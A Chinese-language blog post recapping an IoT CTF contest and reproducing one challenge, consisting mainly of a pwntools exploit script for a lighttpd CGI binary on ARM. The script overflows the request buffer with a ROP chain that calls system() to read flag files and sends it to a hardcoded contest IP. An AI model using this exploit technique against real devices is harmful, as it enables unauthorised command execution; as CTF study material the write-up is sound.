警告
本文最后更新于 2022-03-23,文中内容可能已过时。
这次比赛拿了三等,呜呜呜,都是龙哥在输出,在比赛将要结束的时候做出了一题单点 IOT,个人觉得问题主要在于不够熟悉板子上,在连接板子上就花费了大量的时间和精力,直至比赛结束也没能拿到板子的 Shell。
因为杭州萧山疫情的原因,无法返校,需要在家里隔离 14 天,借此机会,尝试着玩玩这块板子,复现一下当时的赛题,希望明年能够再接再厉。
题目的链接和官方 Writeup 可以看 https://github.com/DasSecurity-HatLab/IoT-CTF-2021
这几天在准备一些虎符PKS的东西,可能这部分内容要晚一些更新。
[collapse title=“Writeup”]
lightttpd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
| from pwn import *
#from Crypto.Util.number import *
#context.log_level = "debug"
context.binary = "./55.cgi"
exit_addr = 0x00010D14
add_sp = 0x000108b8
bss_addr = 0x00022088
puts_addr = 0x00010708
fread_addr = 0x000106F0
pop_r3_addr = 0x0001066c
mov_r0_r7 = 0x00010ec4
pop_fp_addr = 0x00010998
system_addr = 0x10720
show_leak_addr = 0x00010D0C
ROP_chain = [
0, # r4
0, # r5
0, # r6
0x00022088, # r7
0, # r8
system_addr,
]
print hex(len(flat(ROP_chain)))
query = "*#$^" + '\xFF' * 3 + '\xFF\xFF'
query = query.ljust(0x200, 'x')
query += flat(ROP_chain).ljust(0x9E, 'p')
#query = query.ljust(0x2FD - 0x4D, 'a')
x = "cat /ro*/*;"
x += 'a' * ((0x2f4 - len(x)))
x = x[:0x2f4]
query += 'b' * 0x12 + x + 'c' * 4 + p32(add_sp)
DEBUG = 0
if DEBUG:
env = {
"HTTP_COOKIES": "uuid=nocbtm@hatlab!!!",
"REQUEST_METHOD" : "POST",
"CONTENT_TYPE" : "application/x-www-form-urlencoded",
"CONTENT_LENGTH": str(len(query))
}
sh = process(["qemu-arm", "-g", "1234", "-L", "/usr/arm-linux-gnueabi/", "55.cgi"], env=env)
sh.send(query)
# sh.send(payload)
sh.interactive()
else:
sh = remote('114.5.32.22', 80)
data = '''POST /cgi-bin/55.cgi HTTP/1.1
Host: 114.5.32.22
Cookies: uuid=nocbtm@hatlab!!!
Content-Length: {}
Content-Type: application/x-www-form-urlencoded
{}'''.replace('\n', '\r\n').format(len(query), query)
sh.send(data)
sh.interactive()
# sh.send(query)
# # payload = p32(exit_addr) * 0xEE + p32(0x00010D0C)
# # query = "*#$^" + '\xFF' * 3 + '\xFF' + '\xF7'
# # filp_size = 0x2FD + 4 - 0x4D - len(payload)
# # all_data = ('a' * 5 + p32(0x00010D0C) * ((filp_size / 4) - 3)).ljust(0x2FD - 0x4D - 5, 'a')
#
# #nocbtm@hatlab!!!
#sh.recvuntil('\r\n\r\n')
#data = sh.recvuntil("No Authentication", drop=True)
#print long_to_bytes(int(data, 16))[::-1]
# sh.interactive()
|
[/collapse]
[collapse title=“现场图片”]
[/collapse]
wjh
[/collapse]